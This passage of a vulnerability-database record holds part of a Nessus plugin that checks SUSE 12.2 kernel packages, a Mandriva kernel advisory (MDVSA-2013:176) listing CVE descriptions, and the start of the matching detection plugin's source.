reference:\"kernel-xen-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 
reference:\"kernel-xen-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", 
reference:\"kernel-ec2-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:54:13", "description": "Multiple vulnerabilities has been found and corrected in the Linux\nkernel :\n\nThe scm_set_cred function in include/net/scm.h in the Linux kernel\nbefore 3.8.11 uses incorrect uid and gid values during credentials\npassing, which allows local users to gain privileges via a crafted\napplication. (CVE-2013-1979)\n\nThe nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3232)\n\nnet/tipc/socket.c in the Linux kernel before 3.9-rc7 does not\ninitialize a certain data structure and a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3235)\n\nThe rose_recvmsg function in net/rose/af_rose.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3234)\n\nThe llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable\nand a certain data structure, which allows local users to obtain\nsensitive information from kernel stack memory via a crafted recvmsg\nor recvfrom system call. (CVE-2013-3233)\n\nThe llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. 
(CVE-2013-3231)\n\nThe iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3229)\n\nThe irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3228)\n\nThe caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3227)\n\nThe rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3225)\n\nThe bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the\nLinux kernel before 3.9-rc7 does not properly initialize a certain\nlength variable, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted recvmsg or recvfrom\nsystem call. (CVE-2013-3224)\n\nThe ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. 
(CVE-2013-3223)\n\nThe vcc_recvmsg function in net/atm/common.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3222)\n\nInteger overflow in the fb_mmap function in drivers/video/fbmem.c in\nthe Linux kernel before 3.8.9, as used in a certain Motorola build of\nAndroid 4.1.2 and other products, allows local users to create a\nread-write memory mapping for the entirety of kernel memory, and\nconsequently gain privileges, via crafted /dev/graphics/fb0 mmap2\nsystem calls, as demonstrated by the Motochopper pwn program.\n(CVE-2013-2596)\n\narch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before\n3.8.9, when the Performance Events Subsystem is enabled, specifies an\nincorrect bitmask, which allows local users to cause a denial of\nservice (general protection fault and system crash) by attempting to\nset a reserved bit. (CVE-2013-2146)\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux\nkernel before 3.8.9 uses an incorrect integer data type, which allows\nlocal users to gain privileges via a crafted perf_event_open system\ncall. (CVE-2013-2094)\n\nThe ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux\nkernel through 3.8.4 does not properly handle a certain combination of\ninvalid IOAPIC_REG_SELECT and IOAPIC_REG_WINDOW operations, which\nallows guest OS users to obtain sensitive information from host OS\nmemory or cause a denial of service (host OS OOPS) via a crafted\napplication. 
(CVE-2013-1798)\n\nUse-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel\nthrough 3.8.4 allows guest OS users to cause a denial of service (host\nOS memory corruption) or possibly have unspecified other impact via a\ncrafted application that triggers use of a guest physical address\n(GPA) in (1) movable or (2) removable memory during an\nMSR_KVM_SYSTEM_TIME kvm_set_msr_common operation. (CVE-2013-1797)\n\nThe kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux\nkernel through 3.8.4 does not ensure a required time_page alignment\nduring an MSR_KVM_SYSTEM_TIME operation, which allows guest OS users\nto cause a denial of service (buffer overflow and host OS memory\ncorruption) or possibly have unspecified other impact via a crafted\napplication. (CVE-2013-1796)\n\nThe do_tkill function in kernel/signal.c in the Linux kernel before\n3.8.9 does not initialize a certain data structure, which allows local\nusers to obtain sensitive information from kernel memory via a crafted\napplication that makes a (1) tkill or (2) tgkill system call.\n(CVE-2013-2141)\n\nHeap-based buffer overflow in the tg3_read_vpd function in\ndrivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6\nallows physically proximate attackers to cause a denial of service\n(system crash) or possibly execute arbitrary code via crafted firmware\nthat specifies a long string in the Vital Product Data (VPD) data\nstructure. (CVE-2013-1929)\n\nThe main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as\ndistributed in the Linux kernel before 3.8-rc1, allows local users to\ncause a denial of service (daemon exit) via a crafted application that\nsends a Netlink message. NOTE: this vulnerability exists because of an\nincorrect fix for CVE-2012-2669. 
(CVE-2012-5532)\n\nThe udf_encode_fh function in fs/udf/namei.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure member, which\nallows local users to obtain sensitive information from kernel heap\nmemory via a crafted application. (CVE-2012-6548)\n\nThe isofs_export_encode_fh function in fs/isofs/export.c in the Linux\nkernel before 3.6 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nheap memory via a crafted application. (CVE-2012-6549)\n\nnet/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize\ncertain structures, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted application.\n(CVE-2013-2634)\n\nThe rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux\nkernel before 3.8.4 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted application. (CVE-2013-2635)\n\nfs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect\narguments to functions in certain circumstances related to printk\ninput, which allows local users to conduct format-string attacks and\npossibly gain privileges via a crafted application. (CVE-2013-1848)\n\nThe flush_signal_handlers function in kernel/signal.c in the Linux\nkernel before 3.8.4 preserves the value of the sa_restorer field\nacross an exec operation, which makes it easier for local users to\nbypass the ASLR protection mechanism via a crafted application\ncontaining a sigaction system call. (CVE-2013-0914)\n\nHeap-based buffer overflow in the wdm_in_callback function in\ndrivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted cdc-wdm USB\ndevice. 
(CVE-2013-1860)\n\nRace condition in the install_user_keyrings function in\nsecurity/keys/process_keys.c in the Linux kernel before 3.8.3 allows\nlocal users to cause a denial of service (NULL pointer dereference and\nsystem crash) via crafted keyctl system calls that trigger keyring\noperations in simultaneous threads. (CVE-2013-1792)\n\nThe report API in the crypto user configuration API in the Linux\nkernel through 3.8.2 uses an incorrect C library function for copying\nstrings, which allows local users to obtain sensitive information from\nkernel stack memory by leveraging the CAP_NET_ADMIN capability.\n(CVE-2013-2546)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 does not initialize certain structure members, which allows\nlocal users to obtain sensitive information from kernel heap memory by\nleveraging the CAP_NET_ADMIN capability. (CVE-2013-2547)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 uses an incorrect length value during a copy operation, which\nallows local users to obtain sensitive information from kernel memory\nby leveraging the CAP_NET_ADMIN capability. (CVE-2013-2548)\n\nThe translate_desc function in drivers/vhost/vhost.c in the Linux\nkernel before 3.7 does not properly handle cross-region descriptors,\nwhich allows guest OS users to obtain host OS privileges by leveraging\nKVM guest OS privileges. (CVE-2013-0311)\n\nArray index error in the __sock_diag_rcv_msg function in\nnet/core/sock_diag.c in the Linux kernel before 3.7.10 allows local\nusers to gain privileges via a large family value in a Netlink\nmessage. 
(CVE-2013-1763)\n\nThe __skb_recv_datagram function in net/core/datagram.c in the Linux\nkernel before 3.8 does not properly handle the MSG_PEEK flag with\nzero-length data, which allows local users to cause a denial of\nservice (infinite loop and system hang) via a crafted application.\n(CVE-2013-0290)\n\nUse-after-free vulnerability in the shmem_remount_fs function in\nmm/shmem.c in the Linux kernel before 3.7.10 allows local users to\ngain privileges or cause a denial of service (system crash) by\nremounting a tmpfs filesystem without specifying a required mpol (aka\nmempolicy) mount option. (CVE-2013-1767)\n\nThe xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel\nbefore 3.7.9 on 32-bit Xen paravirt_ops platforms does not properly\nhandle an invalid value in the DS segment register, which allows guest\nOS users to gain guest OS privileges via a crafted application.\n(CVE-2013-0228)\n\nMemory leak in drivers/net/xen-netback/netback.c in the Xen netback\nfunctionality in the Linux kernel before 3.7.8 allows guest OS users\nto cause a denial of service (memory consumption) by triggering\ncertain error conditions. (CVE-2013-0217)\n\nThe Xen netback functionality in the Linux kernel before 3.7.8 allows\nguest OS users to cause a denial of service (loop) by triggering ring\npointer corruption. (CVE-2013-0216)\n\nThe __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure, which allows local\nusers to obtain sensitive information from kernel stack memory via a\ncrafted application. 
(CVE-2012-6547)\n\nThe updated packages provides a solution for these security issues.", "edition": 24, "published": "2013-06-25T00:00:00", "title": "Mandriva Linux Security Advisory : kernel (MDVSA-2013:176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5532", "CVE-2013-2635", "CVE-2013-3228", "CVE-2013-1797", "CVE-2013-1767", "CVE-2013-2596", "CVE-2012-6548", "CVE-2013-2141", "CVE-2013-2548", "CVE-2013-0228", "CVE-2013-3232", "CVE-2013-1848", "CVE-2013-1860", "CVE-2013-1763", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-1792", "CVE-2013-2546", "CVE-2012-2669", "CVE-2013-3224", "CVE-2013-3234", "CVE-2013-3233", "CVE-2013-3227", "CVE-2013-0217", "CVE-2013-1929", "CVE-2012-6547", "CVE-2013-0311", "CVE-2013-3225", "CVE-2013-1979", "CVE-2013-3222", "CVE-2013-2146", "CVE-2013-0290", "CVE-2012-6549", "CVE-2013-0914", "CVE-2013-2547", "CVE-2013-2634", "CVE-2013-2094", "CVE-2013-0216", "CVE-2013-1796", "CVE-2013-1798", "CVE-2013-3235", "CVE-2013-3223"], "modified": "2013-06-25T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:kernel-server-devel", "p-cpe:/a:mandriva:linux:lib64cpupower0", "p-cpe:/a:mandriva:linux:cpupower", "p-cpe:/a:mandriva:linux:kernel-firmware", "p-cpe:/a:mandriva:linux:lib64cpupower-devel", "p-cpe:/a:mandriva:linux:perf", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:kernel-server", "p-cpe:/a:mandriva:linux:kernel-headers"], "id": "MANDRIVA_MDVSA-2013-176.NASL", "href": "https://www.tenable.com/plugins/nessus/66975", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:176. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66975);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5532\", \"CVE-2012-6547\", \"CVE-2012-6548\", \"CVE-2012-6549\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\", \"CVE-2013-0290\", \"CVE-2013-0311\", \"CVE-2013-0914\", \"CVE-2013-1763\", \"CVE-2013-1767\", \"CVE-2013-1792\", \"CVE-2013-1796\", \"CVE-2013-1797\", \"CVE-2013-1798\", \"CVE-2013-1848\", \"CVE-2013-1860\", \"CVE-2013-1929\", \"CVE-2013-1979\", \"CVE-2013-2094\", \"CVE-2013-2141\", \"CVE-2013-2146\", \"CVE-2013-2546\", \"CVE-2013-2547\", \"CVE-2013-2548\", \"CVE-2013-2596\", \"CVE-2013-2634\", \"CVE-2013-2635\", \"CVE-2013-3222\", \"CVE-2013-3223\", \"CVE-2013-3224\", \"CVE-2013-3225\", \"CVE-2013-3227\", \"CVE-2013-3228\", \"CVE-2013-3229\", \"CVE-2013-3231\", \"CVE-2013-3232\", \"CVE-2013-3233\", \"CVE-2013-3234\", \"CVE-2013-3235\");\n script_bugtraq_id(56710, 57743, 57744, 57940, 57964, 58053, 58137, 58177, 58368, 58382, 58426, 58510, 58597, 58600, 58604, 58605, 58607, 58908, 58993, 58994, 58996, 59264, 59377, 59380, 59381, 59383, 59385, 59388, 59389, 59390, 59393, 59394, 59396, 59397, 59538, 59846, 60254, 60324);\n script_xref(name:\"MDVSA\", value:\"2013:176\");\n\n script_name(english:\"Mandriva Linux Security Advisory : kernel (MDVSA-2013:176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in the Linux\nkernel :\n\nThe scm_set_cred function in include/net/scm.h in the Linux kernel\nbefore 3.8.11 uses incorrect 
uid and gid values during credentials\npassing, which allows local users to gain privileges via a crafted\napplication. (CVE-2013-1979)\n\nThe nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3232)\n\nnet/tipc/socket.c in the Linux kernel before 3.9-rc7 does not\ninitialize a certain data structure and a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3235)\n\nThe rose_recvmsg function in net/rose/af_rose.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3234)\n\nThe llcp_sock_recvmsg function in net/nfc/llcp/sock.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable\nand a certain data structure, which allows local users to obtain\nsensitive information from kernel stack memory via a crafted recvmsg\nor recvfrom system call. (CVE-2013-3233)\n\nThe llc_ui_recvmsg function in net/llc/af_llc.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. 
(CVE-2013-3231)\n\nThe iucv_sock_recvmsg function in net/iucv/af_iucv.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3229)\n\nThe irda_recvmsg_dgram function in net/irda/af_irda.c in the Linux\nkernel before 3.9-rc7 does not initialize a certain length variable,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted recvmsg or recvfrom system call.\n(CVE-2013-3228)\n\nThe caif_seqpkt_recvmsg function in net/caif/caif_socket.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3227)\n\nThe rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the\nLinux kernel before 3.9-rc7 does not initialize a certain length\nvariable, which allows local users to obtain sensitive information\nfrom kernel stack memory via a crafted recvmsg or recvfrom system\ncall. (CVE-2013-3225)\n\nThe bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the\nLinux kernel before 3.9-rc7 does not properly initialize a certain\nlength variable, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted recvmsg or recvfrom\nsystem call. (CVE-2013-3224)\n\nThe ax25_recvmsg function in net/ax25/af_ax25.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain data structure, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. 
(CVE-2013-3223)\n\nThe vcc_recvmsg function in net/atm/common.c in the Linux kernel\nbefore 3.9-rc7 does not initialize a certain length variable, which\nallows local users to obtain sensitive information from kernel stack\nmemory via a crafted recvmsg or recvfrom system call. (CVE-2013-3222)\n\nInteger overflow in the fb_mmap function in drivers/video/fbmem.c in\nthe Linux kernel before 3.8.9, as used in a certain Motorola build of\nAndroid 4.1.2 and other products, allows local users to create a\nread-write memory mapping for the entirety of kernel memory, and\nconsequently gain privileges, via crafted /dev/graphics/fb0 mmap2\nsystem calls, as demonstrated by the Motochopper pwn program.\n(CVE-2013-2596)\n\narch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before\n3.8.9, when the Performance Events Subsystem is enabled, specifies an\nincorrect bitmask, which allows local users to cause a denial of\nservice (general protection fault and system crash) by attempting to\nset a reserved bit. (CVE-2013-2146)\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux\nkernel before 3.8.9 uses an incorrect integer data type, which allows\nlocal users to gain privileges via a crafted perf_event_open system\ncall. (CVE-2013-2094)\n\nThe ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux\nkernel through 3.8.4 does not properly handle a certain combination of\ninvalid IOAPIC_REG_SELECT and IOAPIC_REG_WINDOW operations, which\nallows guest OS users to obtain sensitive information from host OS\nmemory or cause a denial of service (host OS OOPS) via a crafted\napplication. 
(CVE-2013-1798)\n\nUse-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel\nthrough 3.8.4 allows guest OS users to cause a denial of service (host\nOS memory corruption) or possibly have unspecified other impact via a\ncrafted application that triggers use of a guest physical address\n(GPA) in (1) movable or (2) removable memory during an\nMSR_KVM_SYSTEM_TIME kvm_set_msr_common operation. (CVE-2013-1797)\n\nThe kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux\nkernel through 3.8.4 does not ensure a required time_page alignment\nduring an MSR_KVM_SYSTEM_TIME operation, which allows guest OS users\nto cause a denial of service (buffer overflow and host OS memory\ncorruption) or possibly have unspecified other impact via a crafted\napplication. (CVE-2013-1796)\n\nThe do_tkill function in kernel/signal.c in the Linux kernel before\n3.8.9 does not initialize a certain data structure, which allows local\nusers to obtain sensitive information from kernel memory via a crafted\napplication that makes a (1) tkill or (2) tgkill system call.\n(CVE-2013-2141)\n\nHeap-based buffer overflow in the tg3_read_vpd function in\ndrivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6\nallows physically proximate attackers to cause a denial of service\n(system crash) or possibly execute arbitrary code via crafted firmware\nthat specifies a long string in the Vital Product Data (VPD) data\nstructure. (CVE-2013-1929)\n\nThe main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as\ndistributed in the Linux kernel before 3.8-rc1, allows local users to\ncause a denial of service (daemon exit) via a crafted application that\nsends a Netlink message. NOTE: this vulnerability exists because of an\nincorrect fix for CVE-2012-2669. 
(CVE-2012-5532)\n\nThe udf_encode_fh function in fs/udf/namei.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure member, which\nallows local users to obtain sensitive information from kernel heap\nmemory via a crafted application. (CVE-2012-6548)\n\nThe isofs_export_encode_fh function in fs/isofs/export.c in the Linux\nkernel before 3.6 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nheap memory via a crafted application. (CVE-2012-6549)\n\nnet/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize\ncertain structures, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted application.\n(CVE-2013-2634)\n\nThe rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux\nkernel before 3.8.4 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted application. (CVE-2013-2635)\n\nfs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect\narguments to functions in certain circumstances related to printk\ninput, which allows local users to conduct format-string attacks and\npossibly gain privileges via a crafted application. (CVE-2013-1848)\n\nThe flush_signal_handlers function in kernel/signal.c in the Linux\nkernel before 3.8.4 preserves the value of the sa_restorer field\nacross an exec operation, which makes it easier for local users to\nbypass the ASLR protection mechanism via a crafted application\ncontaining a sigaction system call. (CVE-2013-0914)\n\nHeap-based buffer overflow in the wdm_in_callback function in\ndrivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted cdc-wdm USB\ndevice. 
